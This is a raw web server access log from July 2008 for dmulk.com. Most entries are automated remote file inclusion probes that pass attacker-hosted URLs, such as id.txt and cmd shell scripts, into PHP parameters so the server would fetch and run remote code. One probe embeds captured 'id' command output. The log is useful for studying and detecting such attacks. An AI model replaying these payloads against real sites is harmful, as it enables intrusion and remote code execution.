200.11.67.242 - - [29/Jul/2008:11:44:50 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:44:51 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "libwww-perl/5.65" "www.dmulk.com"
195.5.163.212 - - [29/Jul/2008:11:44:57 -0700] "GET /logs/access_080329.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://purearcade.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:11:44:59 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [29/Jul/2008:11:45:03 -0700] "GET /logs/access_080315.log/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [29/Jul/2008:11:45:04 -0700] "GET /errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [29/Jul/2008:11:45:04 -0700] "GET /logs/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.17.3.26 - - [29/Jul/2008:11:45:22 -0700] "GET /errors.php?error=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.17.3.26 - - [29/Jul/2008:11:45:24 -0700] "GET /logs/access_080315.log/errors.php?error=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.17.3.26 - - [29/Jul/2008:11:45:25 -0700] "GET /logs/errors.php?error=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.186.78.5 - - [29/Jul/2008:11:45:36 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://67.223.229.149/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
208.186.78.5 - - [29/Jul/2008:11:45:36 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://67.223.229.149/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
208.186.78.5 - - [29/Jul/2008:11:45:37 -0700] "GET //index.php?DOCUMENT_ROOT=http://67.223.229.149/id.txt??? HTTP/1.1" 200 18405 "-" "libwww-perl/5.63" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:45:47 -0700] "GET /logs/access_080218.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:45:53 -0700] "GET /logs/access_080218.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.221.130.15 - - [29/Jul/2008:11:46:13 -0700] "GET /logs/access_080207.log/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:11:46:20 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:11:46:20 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:11:46:21 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:11:46:29 -0700] "GET /logs/access_080215.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:11:46:44 -0700] "GET /logs/access.log//includes/messages.inc.php?include_path=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:11:46:44 -0700] "GET //includes/messages.inc.php?include_path=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:11:46:44 -0700] "GET /logs//includes/messages.inc.php?include_path=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.242.197.169 - - [29/Jul/2008:11:46:48 -0700] "GET /logs/access_080218.log HTTP/1.0" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
216.240.136.189 - - [29/Jul/2008:11:46:50 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
67.195.37.125 - - [29/Jul/2008:11:47:06 -0700] "GET /blog/index.php/2008/04/12/ HTTP/1.0" 200 9284 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.125 - - [29/Jul/2008:11:47:06 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://dmulk.com/blog/2008/04/12/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.125 - - [29/Jul/2008:11:47:07 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://dmulk.com/blog/2008/04/12/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
201.17.3.26 - - [29/Jul/2008:11:47:07 -0700] "GET /logs/access_080207.log/errors.php?error=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.37.125 - - [29/Jul/2008:11:47:07 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://dmulk.com/blog/2008/04/12/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
81.198.180.10 - - [29/Jul/2008:11:47:08 -0700] "GET /logs/access.log/undefined/admin.php?DOCUMENT_ROOT=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.97.229.104 - - [29/Jul/2008:11:47:08 -0700] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://purearcade.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.198.180.10 - - [29/Jul/2008:11:47:08 -0700] "GET /undefined/admin.php?DOCUMENT_ROOT=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.97.229.104 - - [29/Jul/2008:11:47:09 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://purearcade.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.198.180.10 - - [29/Jul/2008:11:47:09 -0700] "GET /logs/undefined/admin.php?DOCUMENT_ROOT=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:11:47:09 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:11:47:13 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:11:47:14 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:11:47:14 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.172.196.118 - - [29/Jul/2008:11:47:22 -0700] "GET /logs/access_080218.log HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:11:47:26 -0700] "GET /logs/access_080215.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.48.146 - - [29/Jul/2008:11:47:44 -0700] "GET /logs/access_071230.log//postscript.php?p_mode=http://purearcade.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.174.82.199 - - [29/Jul/2008:11:47:51 -0700] "GET /logs/access_080218.log/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:11:47:58 -0700] "GET /logs/access.log//includes/messages.inc.php?include_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:11:47:59 -0700] "GET //includes/messages.inc.php?include_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:11:47:59 -0700] "GET /logs//includes/messages.inc.php?include_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [29/Jul/2008:11:48:04 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://ashraf.site88.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [29/Jul/2008:11:48:04 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://ashraf.site88.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [29/Jul/2008:11:48:05 -0700] "GET //index.php?DOCUMENT_ROOT=http://ashraf.site88.net/id.txt??? HTTP/1.1" 200 18411 "-" "libwww-perl/5.811" "www.dmulk.com"
125.211.216.53 - - [29/Jul/2008:11:48:09 -0700] "GET /logs/access_080120.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
62.244.71.72 - - [29/Jul/2008:11:48:14 -0700] "GET /logs/access_080218.log/?sourcedir=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.85.201.66 - - [29/Jul/2008:11:48:15 -0700] "GET //index.php?DOCUMENT_ROOT=http://ashraf.site88.net/id.txt??? HTTP/1.1" 200 18411 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [29/Jul/2008:11:48:19 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://ashraf.site88.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [29/Jul/2008:11:48:19 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://ashraf.site88.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:11:48:23 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [29/Jul/2008:11:48:28 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://ashraf.site88.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [29/Jul/2008:11:48:28 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://ashraf.site88.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [29/Jul/2008:11:48:29 -0700] "GET //index.php?DOCUMENT_ROOT=http://ashraf.site88.net/id.txt??? HTTP/1.1" 200 18411 "-" "libwww-perl/5.811" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:11:48:54 -0700] "GET /logs//SQuery/lib/gore.php?libpath=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:11:48:55 -0700] "GET //SQuery/lib/gore.php?libpath=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.70.134 - - [29/Jul/2008:11:48:56 -0700] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/trackback/ HTTP/1.1" 200 9445 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
85.234.133.173 - - [29/Jul/2008:11:49:02 -0700] "GET /logs/access.log//includes/messages.inc.php?include_path=http://www.delta.helloweb.eu/albania1.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:11:49:03 -0700] "GET //includes/messages.inc.php?include_path=http://www.delta.helloweb.eu/albania1.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:11:49:03 -0700] "GET /logs//includes/messages.inc.php?include_path=http://www.delta.helloweb.eu/albania1.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
160.99.12.231 - - [29/Jul/2008:11:49:05 -0700] "GET /logs/access_080329.log//claroline/tracking/userLog.php?rootSys=http://genthal.com/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:49:10 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://h1.ripway.com/spreadnew/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:49:10 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://h1.ripway.com/spreadnew/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:11:49:14 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "libwww-perl/5.810" "www.dmulk.com"
220.32.16.100 - - [29/Jul/2008:11:49:19 -0700] "GET /logs/access_080130.log HTTP/1.0" 200 667419 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:11:49:20 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "libwww-perl/5.803" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:11:49:27 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://www.delta.helloweb.eu/albania1.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.146.102.38 - - [29/Jul/2008:11:49:51 -0700] "GET /logs/access_080329.log/errors.php?error=http://manetu.de/cms_demo/contenido/applets/src/.%20/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.102.38 - - [29/Jul/2008:11:50:12 -0700] "GET /logs/access_080329.log/errors.php?error=http://manetu.de/cms_demo/contenido/applets/src/.%20/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.224.74.43 - - [29/Jul/2008:11:50:14 -0700] "GET /logs/access_080114.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
219.94.155.28 - - [29/Jul/2008:11:50:23 -0700] "GET /logs/access_080329.log/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.iwsbr.net/vitinho/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.155.28 - - [29/Jul/2008:11:50:24 -0700] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.iwsbr.net/vitinho/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.155.28 - - [29/Jul/2008:11:50:24 -0700] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.iwsbr.net/vitinho/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:11:50:36 -0700] "GET /logs/access.log//includes/messages.inc.php?include_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:11:50:37 -0700] "GET //includes/messages.inc.php?include_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:11:50:37 -0700] "GET /logs//includes/messages.inc.php?include_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:11:51:01 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:51:23 -0700] "GET /logs/access_080207.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://h1.ripway.com/spreadnew/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.190.203.220 - - [29/Jul/2008:11:51:25 -0700] "GET /logs/access_080207.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://h1.ripway.com/spreadnew/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:51:25 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://h1.ripway.com/spreadnew/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.190.203.220 - - [29/Jul/2008:11:51:25 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://h1.ripway.com/spreadnew/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:51:25 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://h1.ripway.com/spreadnew/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.190.203.220 - - [29/Jul/2008:11:51:26 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://h1.ripway.com/spreadnew/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.48.146 - - [29/Jul/2008:11:51:37 -0700] "GET /logs/access.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.15 - - [29/Jul/2008:11:51:55 -0700] "GET /errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.196.5.189 - - [29/Jul/2008:11:52:10 -0700] "GET /components/com_galleria/errors.php?error=http://www.sing-kids.de//cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.23.225.235 - - [29/Jul/2008:11:52:18 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
206.117.237.200 - - [29/Jul/2008:11:52:24 -0700] "GET /logs/access_080212.log/enc/content.php?Home_Path=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
206.117.237.200 - - [29/Jul/2008:11:52:24 -0700] "GET /enc/content.php?Home_Path=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:11:52:24 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:11:52:24 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.54.21.66 - - [29/Jul/2008:11:52:26 -0700] "GET /logs/access_080207.log//vwar/backup/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.21.66 - - [29/Jul/2008:11:52:26 -0700] "GET //vwar/backup/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.21.66 - - [29/Jul/2008:11:52:27 -0700] "GET /logs//vwar/backup/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.247.64.150 - - [29/Jul/2008:11:52:32 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.23.225.235 - - [29/Jul/2008:11:52:32 -0700] "GET /logs/access_080315.log/errors.php?error=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.23.225.235 - - [29/Jul/2008:11:52:33 -0700] "GET /logs/errors.php?error=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.23.225.235 - - [29/Jul/2008:11:52:33 -0700] "GET /errors.php?error=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.180.241.37 - - [29/Jul/2008:11:52:36 -0700] "GET /logs/access_080313.log/index.php?pag=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.180.241.37 - - [29/Jul/2008:11:52:38 -0700] "GET /index.php?pag=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 200 18391 "-" "libwww-perl/5.810" "www.dmulk.com"
216.180.241.37 - - [29/Jul/2008:11:52:39 -0700] "GET /logs/index.php?pag=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.117.237.200 - - [29/Jul/2008:11:53:10 -0700] "GET /enc/content.php?Home_Path=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:11:53:15 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:11:53:15 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:11:53:19 -0700] "GET /logs/access.log//includes/messages.inc.php?include_path=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:11:53:20 -0700] "GET //includes/messages.inc.php?include_path=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:11:53:20 -0700] "GET /logs//includes/messages.inc.php?include_path=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [29/Jul/2008:11:53:20 -0700] "GET /logs/access.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.180.241.37 - - [29/Jul/2008:11:53:38 -0700] "GET /logs/access_080218.log/main.php?pag=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.180.241.37 - - [29/Jul/2008:11:53:39 -0700] "GET /main.php?pag=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.180.241.37 - - [29/Jul/2008:11:53:44 -0700] "GET /logs/main.php?pag=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
141.85.101.1 - - [29/Jul/2008:11:53:45 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.85.101.1 - - [29/Jul/2008:11:53:45 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.85.101.1 - - [29/Jul/2008:11:53:46 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.85.101.1 - - [29/Jul/2008:11:53:46 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.180.241.37 - - [29/Jul/2008:11:53:47 -0700] "GET /logs/access_080313.log/main.php?pag=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [29/Jul/2008:11:53:48 -0700] "GET /enc/content.php?Home_Path=http://dantman.com/.../rid?&cmd? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
204.15.10.22 - - [29/Jul/2008:11:53:48 -0700] "GET /logs/enc/content.php?Home_Path=http://dantman.com/.../rid?&cmd? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:53:49 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://h1.ripway.com/spreadnew/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
206.117.237.200 - - [29/Jul/2008:11:53:52 -0700] "GET /logs/access_080212.log/enc/content.php?Home_Path=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [29/Jul/2008:11:53:52 -0700] "GET /enc/content.php?Home_Path=http://www.proostjes.be/calendar